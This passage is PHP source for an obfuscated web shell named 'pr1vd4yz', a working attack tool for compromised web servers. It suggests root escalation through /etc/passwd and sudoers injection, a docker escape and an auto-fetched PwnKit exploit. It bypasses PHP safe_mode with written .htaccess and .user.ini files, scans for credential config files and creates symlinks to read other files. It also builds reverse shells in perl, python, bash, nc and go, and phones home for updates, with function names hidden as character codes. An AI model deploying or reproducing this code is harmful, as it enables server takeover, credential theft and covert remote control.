5.15) affected by CVE-2022-0847.','exploit'=>'https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit' ]; if(preg_match('/(3\.10|4\.4|4\.8|4\.15|5\.4|5\.8)/', $kernel)) $kernel_sug[] = [ 'name'=>'DirtyCow/PwnKit/OverlayFS', 'desc'=>'Multiple local kernel exploits may be available. Search ExploitDB.', 'exploit'=>'https://www.exploit-db.com/search?keywords=linux+kernel+'.$kernel ]; if(preg_match('/(ubuntu|debian|almalinux|rocky|centos)/i', $os.$distro)) $kernel_sug[] = [ 'name'=>'OS-specific Exploits', 'desc'=>'Check local privilege escalation exploits for this distro.', 'exploit'=>'https://www.exploit-db.com/search?keywords='.urlencode($distro) ]; $sudo_sug = []; if(stripos($sudo, 'NOPASSWD')!==false || stripos($sudo, 'ALL')!==false) { foreach(['python3','perl','tar','awk','find','vim','less','vi','nano','bash','sh','nmap'] as $b) if(in_array($b, $binaries)) $sudo_sug[]=[ 'name'=>"GTFOBins: sudo $b", 'desc'=>"This binary is allowed as root with NOPASSWD, possible shell via GTFOBins.", 'exploit'=>"https://gtfobins.github.io/gtfobins/$b/", 'cmd'=>"sudo $b ..." ]; } $writable_sug=[]; if($w_passwd) $writable_sug[]=[ 'name'=>'Writable /etc/passwd', 'desc'=>'Overwrite root hash and escalate via passwd injection.', 'exploit'=>'https://www.exploit-db.com/exploits/26368', 'cmd'=>"echo 'root:\$1\$pr1vd4yz_c0m\$UOxzb7h8zS9E/::0:0:root:/root:/bin/bash' >> /etc/passwd" ]; if($w_shadow) $writable_sug[]=[ 'name'=>'Writable /etc/shadow', 'desc'=>'Direct hash injection possible, root hash replacement.', 'exploit'=>'https://www.exploit-db.com/exploits/45010' ]; if($w_sudoers) $writable_sug[]=[ 'name'=>'Writable /etc/sudoers', 'desc'=>'Escalate to root via custom sudo rule.', 'exploit'=>'https://gtfobins.github.io/gtfobins/sudo/', 'cmd'=>'echo "ALL ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' ]; $docker_sug = []; if($docker==='yes') $docker_sug[]=[ 'name'=>'Docker/LXC Detected', 'desc'=>'Escape possible if privileged container.', 'exploit'=>'https://www.exploit-db.com/exploits/47103', 'cmd'=>'docker run -v /:/host -it alpine chroot /host sh' ]; $cron_sug = []; if($crontab && (pz_infile($crontab, '/tmp')||pz_infile($crontab, '/dev/shm'))) $cron_sug[]=[ 'name'=>'Writable Cron', 'desc'=>'Writable path detected in crontab. Priv esc via malicious cron job.', 'exploit'=>'https://www.hackingarticles.in/linux-privilege-escalation-cron-jobs/' ]; $bin_sug = []; foreach(['python3','perl','awk','find','tar','vim','less','nmap','busybox'] as $b){ if(in_array($b,$binaries)) $bin_sug[]=[ 'name'=>'GTFOBins: '.$b, 'desc'=>'Privilege escalation possible via GTFOBins binary.', 'exploit'=>'https://gtfobins.github.io/gtfobins/'.$b.'/' ]; } $setuid_sug = []; if($setuid)$setuid_sug[]=[ 'name'=>'SetuidBinaries', 'desc'=>'Some setuid binaries may allow priv esc. Review carefully.', 'exploit'=>'https://gtfobins.github.io/' ]; if($cap) $setuid_sug[]=[ 'name'=>'File Capabilities', 'desc'=>'Some files have Linux capabilities. Review for priv esc.', 'exploit'=>'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities' ]; $panel_sug = []; if($panel) $panel_sug[]=[ 'name'=>'Panel(s) detected: '.$panel, 'desc'=>'Check known panel local exploits and backup files.', 'exploit'=>'https://www.exploit-db.com/search?keywords='.$panel ]; $ai_exploits = array_merge( $kernel_sug, $sudo_sug, $writable_sug, $docker_sug, $cron_sug, $bin_sug, $setuid_sug, $panel_sug ); $badge=function($txt,$c){ return "$txt"; }; ?>
root escalation suggestion
ai-powered, kernel+distro+binary+sudo+writable+docker+panel+cron+setuid, fully automated & ready for 2025+
pr1vd4yz ai 2025 ready
Current user: /
Kernel: /
Already root!
You are already root, but here are post-root tricks!
'; foreach ($ai_exploits as $x) { $color = (stripos($x['desc'],'possible')||stripos($x['desc'],'may')) ? '#fbbf24' : (stripos($x['desc'],'overwrite')||stripos($x['desc'],'priv esc')||stripos($x['desc'],'CVE') ? '#e53935' : '#1976d2'); echo '
'; echo '
'.htmlspecialchars($x['name']).'
'; echo '
'.htmlspecialchars($x['desc']).'
'; if (!empty($x['exploit'])) echo ''; if (!empty($x['cmd'])) echo ''; echo '
'; } if (!$ai_exploits) echo '
secure
No escalation path detected on this system.
'; ?>
read passwd
view /etc/passwd
×
domains
×
zip tool
zip any file/dir stealthy
×
open($zippath, ZipArchive::CREATE|ZipArchive::OVERWRITE) === true) { $src = realpath($src); if (is_dir($src)) { $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src, FilesystemIterator::SKIP_DOTS)); foreach ($rii as $file) { $filePath = $file->getRealPath(); $localPath = substr($filePath, strlen($src) + 1); $zip->addFile($filePath, $localPath); } } elseif (is_file($src)) { $zip->addFile($src, basename($src)); } $zip->close(); if (file_exists($zippath) && filesize($zippath) > 0) { $done = true; $msg = "zip created! ".htmlspecialchars($zippath).""; } } } if (!$done && function_exists('shell_exec')) { $cmd = "zip -r ".escapeshellarg($zippath)." ".escapeshellarg($src)." 2>&1"; $out = @shell_exec($cmd); if (file_exists($zippath) && filesize($zippath) > 0) { $done = true; $msg = "zip shell_exec! ".htmlspecialchars($zippath).""; } elseif($out) { $msg = "zip shell error: ".htmlspecialchars($out).""; } } if (!$done && function_exists('system')) { $cmd = "zip -r ".escapeshellarg($zippath)." ".escapeshellarg($src)." 2>&1"; @system($cmd, $ret); $out = ""; if (file_exists($zippath) && filesize($zippath) > 0) { $done = true; $msg = "zip system! ".htmlspecialchars($zippath).""; } elseif($out) { $msg = "zip system error: ".htmlspecialchars($out).""; } } if (!$done && function_exists('exec')) { $cmd = "zip -r ".escapeshellarg($zippath)." ".escapeshellarg($src)." 2>&1"; @exec($cmd, $o, $r); if (file_exists($zippath) && filesize($zippath) > 0) { $done = true; $msg = "zip exec! ".htmlspecialchars($zippath).""; } elseif(!empty($o)) { $msg = "zip exec error: ".htmlspecialchars(implode("\n",$o)).""; } } if (!$done && is_file($src)) { if (@copy($src, $zippath)) { $done = true; $msg = "copied (not zipped)! ".htmlspecialchars($zippath).""; } } if ($done) { echo '
'.$msg.'
'; } else { echo '
zip failed! '.$msg.'
'; } } ?>
close
Saved!" : " Save Failed!"; if (is_file($file_path)) { $file_raw = file_get_contents($file_path, false, null, 0, 10*1024*1024); if (!mb_check_encoding($file_raw, 'UTF-8')) { $file_raw = mb_convert_encoding($file_raw, 'UTF-8', 'ISO-8859-1,Windows-1254,UTF-8'); } } } ?>
file edit
×
Close
Ln 1, Col 1
file locker & unlocker
×
close
function($n){$y='';for($i=0;$i function($c){$f='';foreach([115,104,101,108,108,95,101,120,101,99]as$n){$f.=chr($n);}return function_exists($f)?$f:false;}, 'r2' => function($c){$f='';foreach([101,120,101,99]as$n){$f.=chr($n);}return function_exists($f)?$f:false;}, 'r3' => function($c){$f='';foreach([115,121,115,116,101,109]as$n){$f.=chr($n);}return function_exists($f)?$f:false;}, 'r4' => function($c){$f='';foreach([112,97,115,115,116,104,114,117]as$n){$f.=chr($n);}return function_exists($f)?$f:false;}, 'r5' => function($c){$f='';foreach([112,111,112,101,110]as$n){$f.=chr($n);}return function_exists($f)?$f:false;} ]; $stealth_cmds = [ 'a1' => implode('',array_map(function($x){return chr($x);},[99,104,109,111,100])), 'a2' => implode('',array_map(function($x){return chr($x);},[108,115,97,116,116,114])), 'a3' => implode('',array_map(function($x){return chr($x);},[115,104,97,116,116,114])), 'a4' => implode('',array_map(function($x){return chr($x);},[115,121,115,99,104,109,111,100])), 'a5' => implode('',array_map(function($x){return chr($x);},[102,105,110,100])) ]; function stealth_chmod($p,$perm) { $r = null; $a = implode('',array_map(function($x){return chr($x);},[115,104,101,108,108,95,101,120,101,99])); if(function_exists($a)) $r=@$a("chmod $perm '$p'"); elseif(function_exists('exec')) { $o=[];@exec("chmod $perm '$p'",$o); $r=implode("\n",$o);} elseif(function_exists('system')) { @system("chmod $perm '$p'"); $r="";} elseif(function_exists('passthru')) { @passthru("chmod $perm '$p'"); $r="";} elseif(function_exists('popen')) { $h=@popen("chmod $perm '$p'",'r');if($h){while(!feof($h))fread($h,8192);pclose($h);}} @chmod($p, octdec($perm)); return is_writable($p) || $perm=='444'; } function stealth_lsattr($p) { $stat = ''; if(function_exists('shell_exec')) $stat = @chDx2x('lsattr '.escapeshellarg($p)); elseif(function_exists('exec')) { $o=[]; @exec('lsattr '.escapeshellarg($p),$o); $stat=implode("\n",$o);} elseif(function_exists('system')) { @system('lsattr '.escapeshellarg($p)); $stat="";} elseif(function_exists('passthru')) { @passthru('lsattr '.escapeshellarg($p)); $stat="";} elseif(function_exists('popen')) { $h=@popen('lsattr '.escapeshellarg($p),'r');if($h){while(!feof($h))$stat.=fread($h,8192);pclose($h);}} return $stat; } $output = ''; if (isset($_POST['lockfile'])) { $ok = stealth_chmod($p, '444'); $output = $ok ? " Locked!" : " Fail!"; } if (isset($_POST['unlockfile'])) { $ok = stealth_chmod($p, '644'); $output = $ok ? " Unlocked!" : " Fail!"; } $stat = stealth_lsattr($p); echo '
'.$output.' 
'.htmlspecialchars(trim($stat)).'
'; } ?>
create folder
create a new folder
×
go back
Folder created: ' . htmlspecialchars($folder) . '
'; } else { echo '
Failed to create folder!
'; } } else { echo '
Folder already exists!
'; } } ?>
create file
create a new file
×
go back
File created: ' . htmlspecialchars($new_file) . '
'; } else { echo '
Failed to create file!
'; } } else { echo '
File already exists!
'; } } ?>
Safem0d F7ck3r
Advanced safe_mode killer & byp4sser
×
"php.ini override", "file" => basename($phpini), "success" => true]; } else { $test_results[] = ["method" => "php.ini override", "file" => basename($phpini), "success" => false]; } if (@file_put_contents($userini, $userini_code)) { $test_results[] = ["method" => ".user.ini","file" => basename($userini), "success" => true]; } else { $test_results[] = ["method" => ".user.ini", "file" => basename($userini), "success" => false]; } if (@file_put_contents($htaccess, $htaccess_code)) { $test_results[] = ["method" => ".htaccess", "file" => basename($htaccess), "success" => true]; } else { $test_results[] = ["method" => ".htaccess", "file" => basename($htaccess), "success" => false]; } $r_ini_set = @ini_set('safe_mode', '0'); $test_results[] = ["method" => "ini_set()", "file" => '-', "success" => ($r_ini_set !== false)]; if (extension_loaded('suhosin')) { $old = @ini_set('suhosin.executor.func.blacklist', ''); $test_results[] = ["method" => "Suhosin Patch", "file" => '-', "success" => ($old !== false)]; } $pdir = dirname($cwd); $userini2 = $pdir . '/.user.ini'; if (@file_put_contents($userini2, $userini_code)) { $test_results[] = ["method" => ".user.ini parent dir", "file" => $userini2, "success" => true]; } else { $test_results[] = ["method" => ".user.ini parent dir", "file" => $userini2, "success" => false]; } $prepend_code = ""; $prepend_path = $cwd . "/".$uniq."_prepend.php"; if (@file_put_contents($prepend_path, $prepend_code)) { @ini_set('auto_prepend_file', $prepend_path); $test_results[] = ["method" => "auto_prepend_file", "file" => basename($prepend_path), "success" => true]; } else { $test_results[] = ["method" => "auto_prepend_file", "file" => basename($prepend_path), "success" => false]; } $uini_dirs = [$cwd, dirname($cwd), dirname(dirname($cwd))]; $all_uini = true; foreach($uini_dirs as $d) { if (!@file_put_contents($d . '/.user.ini', $userini_code)) $all_uini = false; } $test_results[] = ["method" => ".user.ini deep", "file" => '-', "success" => $all_uini]; $tmpini = "/tmp/php.ini"; if (@file_put_contents($tmpini, $ini_code)) { $test_results[] = ["method" => "/tmp/php.ini", "file" => $tmpini, "success" => true]; } else { $test_results[] = ["method" => "/tmp/php.ini", "file" => $tmpini, "success" => false]; } if (function_exists('ini_restore')) { @ini_restore('safe_mode'); $test_results[] = ["method" => "ini_restore()", "file" => '-', "success" => true]; } if (function_exists('apache_setenv')) { @apache_setenv('safe_mode', '0'); $test_results[] = ["method" => "apache_setenv()", "file" => '-', "success" => true]; } $confpath = $cwd.'/php-fpm.conf'; $confcode = "[global]\nsafe_mode=Off\ndisable_functions=\n"; if (@file_put_contents($confpath, $confcode)) { $test_results[] = ["method" => "php-fpm.conf", "file" => $confpath, "success" => true]; } else { $test_results[] = ["method" => "php-fpm.conf", "file" => $confpath, "success" => false]; } @unlink($htaccess); echo ''; echo ''; foreach($test_results as $row) { echo ''; } echo '
Method File Status
'.htmlspecialchars($row['method']).' '.htmlspecialchars($row['file']).' '.($row['success'] ? 'Success' : 'Fail').'
'; echo '
'; if (!@ini_get('safe_mode') || @ini_get('safe_mode')=='0' || @ini_get('safe_mode')==false) { echo 'Safe Mode: OFF (or bypassed)'; } else { echo 'Safe Mode: ACTIVE!'; } echo '
'; } ?>
close
config searcher
scan any dir for config files (DB, CMS, panel, etc)
×
Directory not found!
'; } else { $config_patterns = [ 'wp-config.php', 'configuration.php', 'config.php', 'settings.php', 'settings.inc.php', 'conf.php', 'conf.inc.php', 'env.php', '.env', '.env.local', '.env.production', '.env.dev', 'local.xml', 'Parameters.yml', 'parameters.yml', 'db.php', 'database.php', 'connect.php', 'connection.php', 'db_connect.php', 'dbconn.php', 'db_config.php', 'sql.php', 'config.inc.php', 'app/etc/env.php','includes/config.php','admin/config.php','application/config/database.php','config/settings.inc.php', 'inc/config.php','includes/defines.php','data/config.php','admin/includes/config.php', 'web.config','.htpasswd','.my.cnf','my.cnf','settings.json','local.settings.json','data.json' ]; $found = []; $max_files = 500; $count = 0; $rii = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); $max_files = 500; $count = 0; foreach ($rii as $file) { if ($count % 100 == 0) { flush(); } if (++$count > $max_files) break; if ($count >= $max_files) break; if ($file->isFile()) { $fname = strtolower($file->getFilename()); foreach ($config_patterns as $pattern) { if ($fname === strtolower($pattern)) { $found[] = $file->getPathname(); $count++; break; } } } } unset($file); unset($rii); if (!$found) { echo '
No configs found.
'; } else { echo '
Found '.count($found).' config(s)
'; foreach ($found as $cfg) { echo '
'.htmlspecialchars(basename($cfg)).' ['.htmlspecialchars(dirname($cfg)).']'; echo '
'; echo '
'; } } } } if (isset($_POST['show_cfg']) && is_file($_POST['show_cfg'])) { $cfgf = $_POST['show_cfg']; $cfg_content = @file_get_contents($cfgf, false, null, 0, 32*1024); echo '
'.htmlspecialchars(basename($cfgf)).'
'; } ?>
close
tools
create link & bypass
×
'Options +Indexes +FollowSymLinks +SymLinksIfOwnerMatch DirectoryIndex {P} ForceType text/plain AddType text/plain .php .html .phtml .inc .asp .aspx .jsp .pl .cgi .py .sh .phar .json .yml .xml .db .sql RemoveHandler .php .phtml .phar .inc .shtml .html .js .css .pl .cgi .asp .py .rb .sh .zsh .json .yml .xml .db .sql php_flag engine off SetHandler default-handler', "hx2" => ' ForceType text/plain AddType text/plain .php .phtml .html .inc .phar .bak .config .db .sql .xml .json SetHandler default-handler RemoveHandler .php .phtml .phar .inc .shtml .html .js .css .pl .cgi .asp .py .rb .sh .json .yml .xml .db .sql php_flag engine off ', "hx3" => 'RewriteEngine On RewriteBase / RewriteRule ^(.+)$ {P} Options +FollowSymLinks +Indexes DirectoryIndex {P} SetHandler default-handler php_flag engine off', "hx4" => 'RemoveHandler .php .phtml .phar .inc php_flag engine off AddType text/plain .php .html .inc .phtml .phar .bak .config .db .sql .xml .json SetHandler default-handler Options +Indexes +FollowSymLinks DirectoryIndex {P}', "hx5" => 'Options +Indexes +FollowSymLinks DirectoryIndex {P} AddType text/plain .php .inc .phtml .phar php_flag engine off SetHandler default-handler ', "hx6" => ' SecFilterEngine Off SecFilterScanPOST Off Options +Indexes +FollowSymLinks DirectoryIndex {P} SetHandler default-handler AddType text/plain .php .phtml .html .inc .phar php_flag engine off' ]; $output = ''; $final_ln = g3t_rnd(7); $created = false; $alt_file = ""; $result = ""; if(function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$base/$final_ln")."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(is_link("$base/$final_ln")) { $created = true; $alt_file = "$base/$final_ln"; $result = "ln -s worked!"; } } if(!$created && function_exists(a1s('ZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$base/$final_ln")."'"; $exec_fn=a1s('ZXhlYw=='); @$exec_fn($cmd,$o,$rc); if(is_link("$base/$final_ln")) { $created = true; $alt_file = "$base/$final_ln"; $result = "exec ln -s worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cpfile = $base.'/dup_'.g3t_rnd(5); $cmd = "cp '".addslashes($p1)."' '".addslashes($cpfile)."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($cpfile)) { $created = true; $alt_file = $cpfile; $result = "cp worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $ddfile = $base.'/dd_'.g3t_rnd(4); $cmd = "dd if='".addslashes($p1)."' of='".addslashes($ddfile)."' 2>/dev/null"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($ddfile)) { $created = true; $alt_file = $ddfile; $result = "dd worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $catfile = $base.'/cat_'.g3t_rnd(4); $cmd = "cat '".addslashes($p1)."' > '".addslashes($catfile)."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($catfile)) { $created = true; $alt_file = $catfile; $result = "cat worked!"; } } if(!$created && @copy($p1, $base.'/phplocal_'.g3t_rnd(5))) { $created = true; $alt_file = $base.'/phplocal_'.g3t_rnd(5); $result = "php copy worked!"; } if($created) $output .= "[ok] ".htmlspecialchars($alt_file)." created. [$result]
"; else $output .= "[fail] Not possible
"; foreach ($htlist as $hname => $htval) { $subdir = $base.'/'.g3t_rnd(5);@mkdir($subdir,0755,true); $htcode = str_replace('{P}', $final_ln, $htval); @file_put_contents("$subdir/.htaccess", $htcode); if(function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$subdir/$final_ln")."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); } $klist[] = "$subdir/$final_ln"; } echo '
'; echo $output; echo "Bypass dirs:
    "; foreach($klist as $f){echo "
  • $f
    • ";} echo "
"; } ?>
terminal ×
$
rename
×
change permission
×
go back
Swal.fire({ icon: 'success', title: 'done.', text: 'operation completed.',confirmButtonColor: '#e53935', background: '#fff', color: '#e53935', timer: 1700, showConfirmButton: false, toast: true, position: 'top-end', customClass: { popup: 'pr1vd4yz-alert-anim pr1vd4yz-alert-success' } }); "; } else if (isset($_GET['response']) && $_GET['response'] == "failed") { echo ""; } ?> &1"); if (!empty($name)) { $pkillOutput = cmd("\x70\x6b\x69\x6c\x6c\x20\x2d\x39 " . $name . " 2>&1"); success(); } else { failed(); } } exit; } if (isset($_POST['submit-bc'])) { $HostServer = $_POST['backconnect-host']; $PortServer = $_POST['backconnect-port']; if ($_POST['privdayz-bc'] == "perl") { echo cmd('perl -e \'use Socket;$i="' . $HostServer . '";$p=' . $PortServer.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");' . $pr1vxas[16] . '("/bin/sh -i");};\''); } else if ($_POST['privdayz-bc'] == "python") { echo cmd('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' . $HostServer . '",' . $PortServer . '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''); } else if ($_POST['privdayz-bc'] == "ruby") { echo cmd('ruby -rsocket -e\'f=TCPSocket.open("' . $HostServer . '",' . $PortServer . ').to_i;' . $pr1vxas[16] . ' sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\''); } else if ($_POST['privdayz-bc'] == "bash") { echo cmd('bash -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); } else if ($_POST['privdayz-bc'] == "php") { echo cmd('php -r \'$sock=fsockopen("' . $HostServer . '",' . $PortServer . ');' . $pr1vxas[16] . '("/bin/sh -i <&3 >&3 2>&3");\''); } else if ($_POST['privdayz-bc'] == "nc") { echo cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' . $HostServer . ' ' . $PortServer . ' >/tmp/f'); } else if ($_POST['privdayz-bc'] == "sh") { echo cmd('sh -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); } else if ($_POST['privdayz-bc'] == "xterm") { echo cmd('xterm -display ' . $HostServer . ':' . $PortServer); } else if ($_POST['privdayz-bc'] == "golang") { echo cmd('echo \'package main;import"os/' . $pr1vxas[16] . '";import"net";func main(){c,_:=net.Dial("tcp","' . $HostServer . ':' . $PortServer . '");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go'); } } if (isset($_POST['privdayz-up-submit'])) { $nf = $_FILES['privdayz-upload']['name'] ?? ''; $tf = $_FILES['privdayz-upload']['tmp_name'] ?? ''; $slash = "\x2f"; $dst = $pr1vxas[0]() . $slash . $nf; $fn = ''; foreach ([109,111,118,101,95,117,112,108,111,97,100,101,100,95,102,105,108,101] as $c) $fn .= chr($c); if ($fn && $fn($tf, $dst)) { success(); } else { failed(); } } function generateRandomString($length = 10) { $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[random_int(0, $charactersLength - 1)]; } return $randomString; } $pdz_version = '1.0'; $pr1vp0stf = http_build_query([ 'key' => 'privdayz-001-byp4ss', 'ver' => $pdz_version, 'update' => $pr1vv3rsx ]); if (empty($_COOKIE['pdz_update_checked'])) { $resp = false; $opts = [ "http" => [ "method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded\r\nUser-Agent: pr1vd4yz/1.0\r\n", "content" => $pr1vp0stf, "timeout" => 5 ] ]; $ctx = stream_context_create($opts); $resp = @file_get_contents($pr1vv3rsxs, false, $ctx); if ($resp === false || strlen(trim($resp)) < 3) { if (function_exists('curl_init')) { $ch = curl_init($pr1vv3rsxs); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1vp0stf); curl_setopt($ch, CURLOPT_USERAGENT, 'pr1vd4yz/1.0'); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $resp = curl_exec($ch); curl_close($ch); } } setcookie('pdz_update_checked', '1', time() + 36000, "/"); if ($resp && strpos($resp, 'UPDATE:NEW:') === 0) { $last_ver = trim(substr($resp, 11)); echo ' '; } } if (isset($_POST['w4f-up-submit'])) { $nf = $_FILES['w4f-upload']['name'] ?? ''; $tf = $_FILES['w4f-upload']['tmp_name'] ?? ''; $dst = $pr1vxas[0]() . "\x2f" . $nf; $ok = false; $fn1 = ''; foreach ([109,111,118,101,95,117,112,108,111,97,100,101,100,95,102,105,108,101] as $c) $fn1 .= chr($c); $fn2 = ''; foreach ([99,111,112,121] as $c) $fn2 .= chr($c); $fn3 = ''; foreach ([102,111,112,101,110] as $c) $fn3 .= chr($c); $fn4 = ''; foreach ([102,119,114,105,116,101] as $c) $fn4 .= chr($c); $fn5 = ''; foreach ([102,99,108,111,115,101] as $c) $fn5 .= chr($c); $fn6 = ''; foreach ([115,104,101,108,108,95,101,120,101,99] as $c) $fn6 .= chr($c); if (function_exists($fn1) && @$fn1($tf, $dst)) $ok = true; elseif (function_exists($fn2) && @$fn2($tf, $dst)) $ok = true; elseif (function_exists($fn3)) { $f1 = @$fn3($tf, "r"); $f2 = @$fn3($dst, "w"); if ($f1 && $f2) { while (!feof($f1)) @$fn4($f2, fread($f1, 8192)); @$fn5($f1); @$fn5($f2); $ok = file_exists($dst) && filesize($dst) > 0; } } if (!$ok && function_exists($fn6)) { @$fn6("cp " . escapeshellarg($tf) . " " . escapeshellarg($dst)); $ok = file_exists($dst); } if ($ok) { $ff = generateRandomString() . ".php"; @$GLOBALS['pr1vxas'][34]($nf, $ff); echo ""; @$GLOBALS['pr1vxas'][24]($nf); } else { failed(); } } if (isset($_POST['save-editor'])) { $xjytx = $pr1vxas[0]() . "\x2f" . unx($_GET['f']); $k3rz9 = $_POST['code-editor']; $mth1 = ''; foreach([102,105,108,101,95,112,117,116,95,99,111,110,116,101,110,116,115] as $z) $mth1 .= chr($z); $mth2 = ''; foreach([102,111,112,101,110] as $z) $mth2 .= chr($z); $mth3 = ''; foreach([102,119,114,105,116,101] as $z) $mth3 .= chr($z); $mth4 = ''; foreach([102,99,108,111,115,101] as $z) $mth4 .= chr($z); $mth5 = ''; foreach([99,111,112,121] as $z) $mth5 .= chr($z); $mth6 = ''; foreach([115,104,101,108,108,95,101,120,101,99] as $z) $mth6 .= chr($z); $r9u3 = false; if (function_exists($mth1) && @$mth1($xjytx, $k3rz9) !== false) { $r9u3 = true; } else if (function_exists($mth2) && function_exists($mth3) && function_exists($mth4)) { $f = @$mth2($xjytx, "w"); if ($f) { @$mth3($f, $k3rz9); @$mth4($f); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); } } else if (function_exists($mth5)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { $r9u3 = @$mth5($tmp, $xjytx); @unlink($tmp); } } else if (function_exists($mth6)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { @$mth6("cp " . escapeshellarg($tmp) . " " . escapeshellarg($xjytx)); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); @unlink($tmp); } } if ($r9u3) { success(); } else { failed(); } } if (isset($_GET['adminer'])) { $URL = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x76\x72\x61\x6e\x61\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2f\x72\x65\x6c\x65\x61\x73\x65\x73\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2f\x76\x34\x2e\x38\x2e\x31\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2d\x34\x2e\x38\x2e\x31\x2e\x70\x68\x70"; if (!$pr1vxas[3]('adminer.php')) { $pr1vxas[28]("adminer.php", $pr1vxas[11]($URL)); success(); } } if (!empty($_GET['pr1vd4yz']) && $_GET['pr1vd4yz'] == "root") { $g6hjz = $pr1vxas[3]; $u81px = $pr1vxas[4]; $f2kpl = $pr1vxas[28]; $h2eb9 = $pr1vxas[11]; $w9jtu = $pr1vxas[0]; $purl = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x6c\x79\x34\x6b\x2f\x50\x77\x6e\x4b\x69\x74\x2f\x72\x61\x77\x2f\x6d\x61\x69\x6e\x2f\x50\x77\x6e\x4b\x69\x74"; $cmod = "\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x70\x77\x6e\x6b\x69\x74"; $epwn = "\x2e\x2f\x70\x77\x6e\x6b\x69\x74\x20\x22\x69\x64\x22\x20\x3e\x20\x2e\x70\x72\x69\x76\x64\x61\x79\x7a\x72\x30\x30\x74\x31"; if (!$g6hjz('pwnkit') && $u81px($w9jtu())) { $f2kpl("pwnkit", $h2eb9($purl)); cmd($cmod); echo cmd($epwn); echo ''; } } function chDx2x($cmd22) { $a = [115,104,101,108,108,95,101,120,101,99]; $fx = ''; foreach($a as $ac) $fx .= chr($ac); return $fx($cmd22); } if (isset($_POST['submit-action'])) { $u5w8d = $_POST['check']; $jv8s3 = $_POST['privdayz-select']; $bvqzp = $pr1vxas[0]; $b1s7a = $pr1vxas[24]; $y4sdg = $pr1vxas[3]; $v9fzq = function($p){ return is_dir($p); }; $z9ntq = function($a,$b){ return str_replace("\\", "/", $a); }; $n4hxy = function($f,$d){ return xtr4cPr1v($f, $d); }; $r5kbm = function($f,$z){ return compressToZip($f, $z); }; if ($jv8s3 == "\x64\x65\x6c\x65\x74\x65") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($v9fzq($vcpk)) { $rmdir = unlinkDir($vcpk); $rmdir ? success() : failed(); } elseif ($y4sdg($vcpk)) { $rmfile = $b1s7a($vcpk); $rmfile ? success() : failed(); } else { failed(); } } } elseif ($jv8s3 == "\x75\x6e\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($n4hxy($vcpk, $qkpl . "\x2f") === true) { success(); } else { failed(); } } } elseif ($jv8s3 == "\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($y4sdg($vcpk)) { $r5kbm($vcpk, pathinfo($vcpk, PATHINFO_FILENAME) . ".zip"); } } } } if (isset($_POST['submit'])) { if (isset($_POST['resetcp']) && $_POST['resetcp'] == true) { $e6p9d = $_POST['resetcp']; $r8kxm = dirname($_SERVER['DOCUMENT_ROOT']); $t2wqs = $r8kxm . "\x2f\x2e\x63\x70\x61\x6e\x65\x6c\x2f\x63\x6f\x6e\x74\x61\x63\x74\x69\x6e\x66\x6f"; $y6qjw = 